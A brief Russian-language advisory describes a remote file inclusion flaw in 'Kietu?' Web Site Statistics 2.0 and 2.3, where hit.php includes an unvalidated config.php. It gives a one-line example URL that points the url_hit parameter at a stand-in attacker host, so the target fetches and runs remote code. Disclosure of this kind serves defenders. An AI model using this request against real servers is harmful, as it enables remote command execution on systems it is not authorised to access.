Уязвимость подключения файла обнаружена в программе 'Kietu?' Web Site Statistics. Удаленный пользователь может выполнять произвольные команды на операционной системе.
Файл hit.php подключает файл config.php, не подтверждая правильности включенного файла. В результате удаленный атакующий может сконструировать URL, который ссылается на другой файл
config.php, расположенный на удаленном сервере. Этот файл будет включен и выполнен целевым сервером. Пример:
http://[target]/hit.php?url_hit=http://[attacker]/
Уязвимость обнаружена в 'Kietu?' Web Site Statistics 2.0, 2.3.
